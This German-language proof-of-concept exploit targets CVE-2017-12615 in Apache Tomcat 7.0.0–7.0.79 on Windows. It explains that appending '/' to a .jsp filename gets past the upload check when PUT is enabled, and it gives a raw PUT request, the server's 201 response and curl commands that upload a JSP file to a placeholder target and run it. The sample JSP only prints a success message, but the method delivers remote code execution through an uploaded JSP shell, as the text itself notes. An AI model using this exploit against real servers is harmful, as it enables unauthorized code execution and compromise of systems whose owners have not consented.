
POC-Exploit für Apache Tomcat 7.0.x CVE-2017-12615 PUT JSP-Schwachstelle.
POC Exploit für Apache Tomcat 7.0.0 bis 7.0.79 unter Windows; CVE-2017-12615 PUT JSP-Schwachstelle.
Standardmäßig ist es nicht erlaubt, JSP-Dateien über die PUT-Methode auf den Apache Tomcat-Servern hochzuladen. Dies ist wahrscheinlich eine Sicherheitsmaßnahme, um zu verhindern, dass ein Angreifer eine JSP-Shell hochlädt und eine entfernte Codeausführung auf dem Server erlangt. Aufgrund unzureichender Prüfungen könnte ein Angreifer jedoch eine entfernte Codeausführung auf Tomcat-Servern der Versionen 7.0.{0 bis 79} erreichen, die PUT aktiviert haben, indem er eine speziell gestaltete HTTP-Anfrage mit der PUT-Methode an den Tomcat-Server sendet. Aber ernsthaft, speziell? Bitte.
Durch Anhängen eines '/' Zeichens hinter der Dateinamenerweiterung kann die Überprüfung der Dateierweiterung umgangen werden. Das war's. Also eigentlich nicht so speziell.
PUT /myfile.jsp/
Host: domain-name:port
Connection: close
Content-Length: 85
<% out.write("<html><body><h3>[+] JSP upload successfully.</h3></body></html>"); %>
HTTP/1.1 201 Created
Server: Apache-Coyote/1.1
Content-Length: 0
Date: Sat, 23 Sep 2017 06:36:36 GMT
Connection: close
<% out.write("<html><body><h3>[+] JSP file successfully uploaded via curl and JSP out.write executed.</h3></body></html>"); %>
curl -X PUT http://target-host-or-ip-address:port/test.jsp/ -d @- < test.jsp
curl http://target-host-or-ip-address:port/test.jsp